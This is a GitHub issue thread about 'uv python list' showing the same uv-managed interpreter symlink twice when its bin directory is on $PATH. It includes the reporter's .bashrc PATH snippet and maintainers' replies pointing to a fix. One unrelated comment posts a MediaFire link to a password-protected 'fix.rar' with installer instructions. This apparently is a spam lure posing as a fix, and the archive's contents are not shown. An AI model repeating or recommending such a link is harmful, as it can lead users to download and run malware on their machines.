### ISSUE TITLE
uv python list shows duplicate symlinks

### ISSUE THREAD

**Issue by jooon** [astral-sh/uv#6690]
When I put uv managed python in $PATH, uv lists the same symlink twice. Likely once from uv knowing where its own python is and also finding it in $PATH.

```
$ uv --version
uv 0.3.4
$ uv python list
cpython-3.12.5-linux-x86_64-gnu     .local/share/uv/python/cpython-3.12.5-linux-x86_64-gnu/bin/python3.12
cpython-3.12.5-linux-x86_64-gnu     .local/share/uv/python/cpython-3.12.5-linux-x86_64-gnu/bin/python3 -> python3.12
cpython-3.12.5-linux-x86_64-gnu     .local/share/uv/python/cpython-3.12.5-linux-x86_64-gnu/bin/python -> python3.12
cpython-3.12.5-linux-x86_64-gnu     .local/share/uv/python/cpython-3.12.5-linux-x86_64-gnu/bin/python3 -> python3.12
cpython-3.11.9-linux-x86_64-gnu     <download available>
cpython-3.10.14-linux-x86_64-gnu    <download available>
cpython-3.10.12-linux-x86_64-gnu    /usr/bin/python3.10
cpython-3.10.12-linux-x86_64-gnu    /usr/bin/python3 -> python3.10
cpython-3.10.12-linux-x86_64-gnu    /bin/python3.10
cpython-3.10.12-linux-x86_64-gnu    /bin/python3 -> python3.10
cpython-3.9.19-linux-x86_64-gnu     <download available>
cpython-3.8.19-linux-x86_64-gnu     .local/share/uv/python/cpython-3.8.19-linux-x86_64-gnu/bin/python3.8
cpython-3.8.19-linux-x86_64-gnu     .local/share/uv/python/cpython-3.8.19-linux-x86_64-gnu/bin/python3 -> python3.8
cpython-3.8.19-linux-x86_64-gnu     .local/share/uv/python/cpython-3.8.19-linux-x86_64-gnu/bin/python -> python3.8
cpython-3.8.19-linux-x86_64-gnu     .local/share/uv/python/cpython-3.8.19-linux-x86_64-gnu/bin/python3 -> python3.8
pypy-3.7.13-linux-x86_64-gnu        <download available>
```

The reason I have put uv python is that I have finally replaced mise/pyenv with just uv.

I only ever used pyenv like this:

```
pyenv install 3.12 3.8
pyenv global 3.12 3.8
```

I mostly wanted `python3.12` and `python3.8` to end up in $PATH wherever I was and then the tools that when I needed a specific python I never configured `3.8` in a .python-version and then called `python3`, but rather called the minor version like `python3.8` directly. This works for instance great with tox.

My pyenv replacement is thus just:

```
uv python install 3.12 3.8
```

Instead of activating pyenv and putting a directory with shims in $PATH, I instead have this in my .bashrc which adds the bin directories in reverse version order.

```
UVPYTHON="$HOME/.local/share/uv/python"
case ":$PATH" in
    *:"$UVPYTHON"*)
    ;;
    *)
    PATH=$(ls -1dvr "$UVPYTHON"/*/bin 2> /dev/null | tr $'\n' ':')$PATH
    ;;
esac
```

**Comment by zanieb** [comment]
Some of this behavior is intentional, per the discussion at https://github.com/astral-sh/uv/issues/5308 and change at https://github.com/astral-sh/uv/pull/5343

I think the only true duplicates here are, e.g., the first and third lines here:

```
cpython-3.8.19-linux-x86_64-gnu     .local/share/uv/python/cpython-3.8.19-linux-x86_64-gnu/bin/python3 -> python3.8
cpython-3.8.19-linux-x86_64-gnu     .local/share/uv/python/cpython-3.8.19-linux-x86_64-gnu/bin/python -> python3.8
cpython-3.8.19-linux-x86_64-gnu     .local/share/uv/python/cpython-3.8.19-linux-x86_64-gnu/bin/python3 -> python3.8
```

The rest are "correct" though we could consider a better way to display interpreters with multiple symlinks.

**Comment by KazySahab** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by jooon** [comment]
> I think the only true duplicates here are, e.g., the first and third lines here:

Yes. Those lines are what I referred to as duplicates.

**Comment by charliermarsh** [comment]
I believe this was closed by https://github.com/astral-sh/uv/pull/6740.
